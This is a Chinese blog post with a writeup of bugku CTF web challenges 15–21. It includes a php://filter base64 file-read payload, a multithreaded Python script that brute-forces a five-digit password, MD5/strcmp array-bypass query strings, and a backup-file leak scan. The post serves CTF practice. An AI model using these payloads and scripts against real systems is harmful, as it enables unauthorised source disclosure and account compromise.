bugkuCTF Writeup (Web)15-21

最新推荐文章于 2024-02-23 11:52:51 发布
最新推荐文章于 2024-02-23 11:52:51 发布
阅读量4.7k 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/troublor/article/details/79163574
版权

Web4

第十五题
看源代码,一大堆东西解码,发现eval执行的是:

function checkSubmit() {
    var a = document.getElementById("password");
    if ("undefined" != typeof a) {
        if ("67d709b2b54aa2aa648cf6e87a7114f1" == a.value) return !0;
        alert("Error");
        a.focus();
        return !1
    }
}

document.getElementById("levelQuest").onsubmit = checkSubmit;

总之就是要把form提交上去,于是直接去用postman提交,提交的password就是代码里的那一串字符串
这里写图片描述
取得flag

Web5

这里写图片描述
第一反应看源码,一大堆[]!()+那肯定就是jother了
扔进console执行这段jother
这里写图片描述
输出就是flag

flag在index里

这里写图片描述
题目提示flag在index里,那就是要看index的源码了
点一下链接发现url变成了

http://120.24.86.145:8005/post/index.php?file=show.php

以为是源码泄露什么的,去请求.swp .bak文件,无果
很长时间都无解,后面的题都做完了这道题依然毫无头绪,估计是碰到没接触过的知识点了
去查了一下发现使用php://filter协议
链接一下大牛的文章: leavesongs
基本上原理就是利用php://filter在执行index.php之前将其内容用base64编码,这样就掩盖了<?php,导致无法执行直接输出,输出的是base64编码之后的内容,再解一下码就可以了
payload:http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=./index.php

输入密码查看flag

这里写图片描述
输入框提示要输入5位数字密码
这里写图片描述
第一反应是传统的sql注入,试了各种方法,都不行,可能过滤的比较严
徘徊之时,突然发现url上有baopo 这样的汉语拼音,这不就是爆破 嘛,果断暴力破解
Python3代码:

import requests
import threading

psw = 0
lock = threading.RLock()
gotit = False
correct = ""


class BreakThread(threading.Thread):
    def run(self):
        global psw, gotit, correct
        while True:
            lock.acquire()
            if psw > 99999 or gotit:
                lock.release()
                break
            d = {
                "pwd": str(psw).zfill(5)
            }
            psw = psw + 1
            lock.release()
            r = requests.post("http://120.24.86.145:8002/baopo/?yes", data=d)
            r.encoding = "utf-8"
            try:
                r.text.index("密码不正确")
            except ValueError:
                print(d["pwd"] + "   right")
                gotit = True
                lock.acquire()
                correct = d["pwd"]
                lock.release()
                break
            else:
                print(d["pwd"] + "   wrong")


l = []
for i in range(2):
    l.append(BreakThread())
for i in l:
    i.start()
for i in l:
    i.join()
print("正确密码:"+correct)

这里我就开了2个线程,开太多会网络阻塞
跑出来密码是13579

前女友

这里写图片描述
藏在源代码里面有一个链接,点开又是php绕过,这回是md5
这里写图片描述
md5函数处理的必须是字符串,如果传入的是数组就可以绕过判断
strcmp也有漏洞,比较的必须是字符串,如果是数组同样也可绕过
payload: http://47.93.190.246:49162/?v1[]=sdfsdf&v2[]=sadf&v3[]=bbb

JavaScript

这里写图片描述
让我点一百万次???
我就只点一次源代码
javascript代码中,当点击次数达到1000000次的时候,发送一个post请求,那我就直接用postman发就好了
这里写图片描述

听说备份是个好习惯

这里写图片描述
打开一串看不懂的东西
提示说到“备份”,可能是备份文件泄露,于是用了一个php代码泄露检测的小工具SourceLeakHacker
检测了一下发现了index.php.bak文件,打开来
这里写图片描述
类似的md5绕过,只是前面加了一些简单的过滤,和之前几题有很多相似之处
payload: http://120.24.86.145:8002/web16/?kkeyey1[]=1&kkeyey2[]=wqerqwe

PS:前面的那个python多线程脚本,线程开到5个跑到三千多的时候就和服务器断连了,不知道为什么,这才减少到两个线程

Troublor
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUGKU web--writeup
Sanky0u的博客
08-15 1万+
因为已经看到过很多关于bugku平台上面web题的writeup,我想自己就不需要每道题都写了,只写自己比较有收获的几题的writeup,并且将自己收集到的好几种解法都放上来。1. 文件上传测试这道题提示上传php文件,但选择php文件上传的时候又提示非图片文件。解法1:将一个php文件的后缀名改成.php.jpg或者.php.png,然后选择这个文件,点击上传的时候用burpsuite抓包,改文件
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3289
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
bugku平台web部分writeup
test
10-16 4742
前言 很久以前基本就做完了bugku平台上的web题目,最近整理整理一下。 正文 web2 提示:听说聪明的人都能找到答案 链接 flag在源代码中。 计算器 后言 ...
BUGKU-WEB 备份是个好习惯
最新发布
天泽岁月
02-23 1449
BUGKU-WEB 备份是个好习惯,MD5 弱比较
Bugku-web之备份是个好东西
weixin_42939822的博客
03-06 144
Bugku-web之备份是个好东西
bugku——md5()函数
吃肉唐僧的博客
09-01 863
打开题目,又是MD5函数 以为又是一个套路直接md5('240610708') == md5('QNKCDZO')去尝试 结果构造http://123.206.87.240:9009/18.php?username=240610708&&password=QNKCDZO一直失败 后来再审计代码,发现判断的时候用了===, 所以而刚才我用那个的方法MD5只能==弱类型绕过 ...
Bugku MD5 wp
m0_63253040的博客
04-25 354
进入环境只有一句话 让我们输入一个a 题目提示md5碰撞,那我们传入这些值中的一个即可 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e5.
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 5810
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTF——webwriteup(持续更新)
热门推荐
过客璇璇的博客
03-23 6万+
BugkuCTF——webwriteup 平台网址:http://ctf.bugku.com/ 平台首页: web2 网址链接:http://120.24.86.145:8002/web2/ 页面: 一看只有好多滑稽,分数也不太高,应该不是很难,F12打开开发者工具看一下 得到ctf:flag KEY{Web-2-bugKssNNikls9100} 文件上传测试 链...
BUGKU CTF WEB (10-15题)
半夜好饿的博客
10-25 2993
11、web5 点开网址后: 随便输入提交看看: 并没有出现什么,F12查看代码,会发现一个奇怪的东西: 百度以后发现是某种编码,将其丢到控制台出直接解码,得到flag。 flag:ctf{whatfk} 12、头等舱 点开网址后: 会发现如文字所述,什么也没有,查看代码,emmm,也很干净,什么都莫得orz。 用抓包试试看吧,或许能有什么东西。 抓包后发现了 flag。查看了其...
bugkuCTF Writeup (Web)10-14
Troublor的博客
01-24 4110
SQL注入1 代码审计 先过滤sql关键字,再过滤xss(实际上就是删除一些html标签),这个顺序就很好办了,把HTML标签插到sql关键字里面,就绕过了第一个过滤,第二个过滤之后就还原了sql关键字 之后就是基本的判断字段数、爆数据库名、爆flag payload:http://103.238.227.13:10087/?id=1 union select id,hash fr
bugkuCTF Writeup (Web)26-29
Troublor的博客
01-28 3123
never give up 看源码,有提示 去看1p.html的源码 HTML> HEAD> SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJ
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值